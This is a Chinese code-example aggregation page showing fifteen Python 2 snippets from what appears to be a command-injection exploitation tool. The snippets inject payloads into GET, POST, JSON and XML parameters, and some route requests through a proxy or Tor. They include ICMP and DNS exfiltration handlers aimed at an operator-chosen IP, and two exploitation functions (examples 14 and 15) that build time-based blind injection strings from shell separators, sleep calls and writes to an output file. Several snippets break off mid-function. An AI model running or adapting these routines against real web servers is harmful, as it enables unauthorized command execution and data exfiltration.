本文整理汇总了Python中src.core.requests.parameters.vuln_POST_param函数的典型用法代码示例。如果您正苦于以下问题:Python vuln_POST_param函数的具体用法?Python vuln_POST_param怎么用?Python vuln_POST_param使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了vuln_POST_param函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: icmp_exfiltration_handler
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.BGRED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
示例2: icmp_exfiltration_handler
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
示例3: icmp_exfiltration_handler
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + "(x) Error: You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
os._exit(0)
示例4: injection_test
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
示例5: injection_test
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = get_request_response(request)
end = time.time()
how_long = int(end - start)
return how_long, vuln_parameter
示例6: post_request
def post_request(url, http_request_method, filename, delay):
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
check_parameters = []
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
check_parameters.append(check_parameter)
#if not menu.options.level > 1:
header_name = ""
checks.print_non_listed_params(check_parameters, http_request_method, header_name)
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
# Check for session file
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename, delay)
示例7: injection_test
def injection_test(payload, http_request_method, url):
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
示例8: injection_test
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
if " " in payload:
payload = payload.replace(" ","%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Get the response of the request.
response = requests.get_request_response(request)
return response, vuln_parameter
示例9: icmp_exfiltration_handler
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.RED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
request_data = vuln_parameter
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
request_data = vuln_parameter
ip_data = menu.options.ip_icmp_data
# Load the module ICMP_Exfiltration
try:
from src.core.modules import ICMP_Exfiltration
except ImportError as e:
print colors.RED + "(x) Error:", e
print colors.RESET
sys.exit(1)
technique = "ICMP exfiltration technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
sys.stdout.flush()
ip_src = re.findall(r"ip_src=(.*),", ip_data)
ip_src = ''.join(ip_src)
ip_dst = re.findall(r"ip_dst=(.*)", ip_data)
ip_dst = ''.join(ip_dst)
ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
示例10: injection_test
def injection_test(payload,http_request_method,url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
示例11: dns_exfiltration_handler
def dns_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print "\n" + settings.print_critical_msg(err_msg)
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
示例12: do_check
def do_check(url, filename):
check_http_headers = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET.
if not menu.options.data:
# Enable Cookie Injection
if menu.options.cookie and menu.options.level > 1:
settings.COOKIE_INJECTION = True
http_request_method = "GET"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
# Enable Cookie Injection
if menu.options.cookie:
settings.COOKIE_INJECTION = True
if not settings.COOKIE_INJECTION:
found_url = parameters.do_GET_check(url)
if found_url != False:
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter, http_request_method, filename, delay)
if not settings.LOAD_SESSION :
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
else:
injection_proccess(url, check_parameter, http_request_method, filename, delay)
# Check if HTTP Method is POST.
else:
http_request_method = "POST"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2 :
check_parameter = ""
stored_http_header_injection(url, check_parameter, check_http_headers, http_request_method, filename, delay)
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Remove whitespaces
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
#.........这里部分代码省略.........
示例13: SystemExit
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
示例14: exploitation
#.........这里部分代码省略.........
break
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
if seperator == ";" or seperator == "&&" or seperator == "||":
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
end = time.time()
how_long = int(end - start)
except:
示例15: exploitation
#.........这里部分代码省略.........
"$(python -c \"import time;time.sleep(0)\") " + seperator + " "
"str=$(echo "+ TAG + " > " + OUTPUT_TEXTFILE + ") " + seperator + " "
# Find the length of the output, using readline().
"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + seperator + " "
"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
"$(python -c \"import time;time.sleep("+ str(delay) +")\") "
)
if http_request_method == "POST":
seperator = urllib.unquote(seperator)
elif seperator == "||" :
payload = (seperator + " "
"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+
# Find the length of the output, using readline().
"[ " + str(j) + " -ne $(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") ] " + seperator + " "
"$(python -c \"import time;time.sleep(0)\") | $(python -c \"import time;time.sleep("+ str(delay) +")\")"
)
else:
break
#-----------------------------------------------------------------------------------------
# Check if defined "--verbose" option.
if menu.options.verbose:
if seperator == ";" or seperator == "&&" or seperator == "||":
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()